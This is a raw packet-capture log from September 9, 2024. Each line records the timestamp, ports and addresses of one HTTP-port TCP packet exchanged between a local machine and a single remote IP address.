                                              Sep 9, 2024 17:49:13.422858000 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.422883034 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.422897100 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.422909021 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.422930956 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.422982931 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.510231018 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510247946 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510267019 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510283947 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510294914 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510305882 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510330915 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.510330915 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.510766983 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510790110 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510806084 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.510955095 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.510987043 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.511013031 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511023998 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511034012 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511053085 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.511101961 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511112928 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511130095 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.511817932 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511854887 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.511859894 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511873007 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511902094 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.511969090 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511985064 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.511996984 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.512017012 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.512818098 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.512831926 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.512841940 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.512852907 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.512856007 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.512868881 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.515193939 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.515228987 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.515244961 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.604798079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.604834080 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.604845047 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.604861975 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.604873896 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.604885101 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.604892015 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.604907036 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.604943037 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.604954004 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.604964018 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.604980946 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.605098009 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605108023 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605118036 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605128050 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605137110 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.605164051 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.605287075 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605298042 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605307102 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605317116 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605324984 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.605329037 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605343103 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605345964 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.605374098 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.605410099 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605518103 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605528116 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605537891 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605546951 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605547905 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.605557919 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.605560064 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.605590105 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.606024981 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606076956 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606086016 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606110096 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.606138945 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606169939 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.606215000 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606225967 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606235027 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606245995 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606247902 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.606276035 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.606388092 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606400013 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606409073 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606419086 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606420994 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.606456995 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.606920004 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.606992006 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607002020 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607021093 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.607089043 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607099056 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607110023 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607120991 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.607218981 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607228994 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607239008 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607248068 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607250929 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.607259035 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607270002 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.607275009 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.607302904 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853172064 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853230953 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853240013 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853251934 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853310108 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853353977 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853364944 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853370905 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853379965 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853390932 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853406906 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853425980 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853532076 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853543043 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853553057 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853562117 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853571892 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853573084 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853591919 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853797913 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853807926 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853817940 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853830099 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853835106 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853841066 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853848934 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853852034 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853866100 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853873014 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.853876114 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.853887081 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885320902 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885325909 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885332108 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885344028 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885349989 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885354996 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885369062 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885375977 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885401964 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885584116 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885596037 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885606050 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885616064 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885627031 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885637045 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885643005 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885649920 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885662079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885672092 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885683060 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885685921 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885694981 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885700941 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885709047 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885723114 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.885725021 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.885754108 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886145115 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886157036 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886167049 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886177063 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886185884 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886187077 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886198997 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886208057 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886210918 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886224031 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886230946 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886235952 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886248112 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886254072 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886259079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886270046 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886279106 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886281967 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886300087 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886495113 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886507034 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886521101 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886531115 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.886531115 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.886564016 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975265980 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975282907 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975295067 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975317955 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975327969 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975339890 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975339890 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975352049 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975364923 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975373983 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975382090 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975382090 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975430965 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975474119 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975485086 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975516081 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975522995 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975542068 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975553036 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975564003 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975575924 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975575924 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975588083 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975589991 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975601912 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975622892 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975760937 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975794077 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975812912 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975824118 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975856066 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975950003 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975960970 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975971937 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975985050 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.975990057 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.975996971 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976022959 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976190090 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976201057 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976212025 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976222992 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976232052 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976234913 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976253033 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976273060 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976284981 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976294994 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976305008 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976310968 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976317883 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976336002 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976531029 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976550102 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976561069 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976568937 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976571083 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976583004 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976591110 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976593018 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976603985 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976613998 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976613998 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976625919 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976635933 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976638079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976656914 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.976970911 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976980925 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.976990938 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977003098 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977011919 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977013111 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977025032 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977032900 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977039099 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977058887 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977113008 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977123976 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977134943 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977154970 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977235079 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977246046 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977256060 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977267027 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977273941 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977277994 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977288008 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977293015 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977297068 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977298975 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977344990 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977690935 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977701902 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977711916 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977722883 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977732897 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977732897 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977744102 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977746964 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977756023 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977766037 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977776051 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977776051 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977787018 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977792025 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977798939 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977952957 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.977976084 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977987051 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.977998972 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978008032 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978019953 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978044033 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978260994 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978271961 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978287935 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978298903 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978308916 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978311062 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978321075 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978327990 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978332043 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978343010 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978353024 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978354931 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978363991 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978369951 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978375912 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978385925 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978396893 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978398085 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978409052 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978415012 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978421926 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978444099 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978786945 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978796959 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978806973 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978816986 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978827000 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978828907 CEST4916980192.168.2.22185.235.137.223
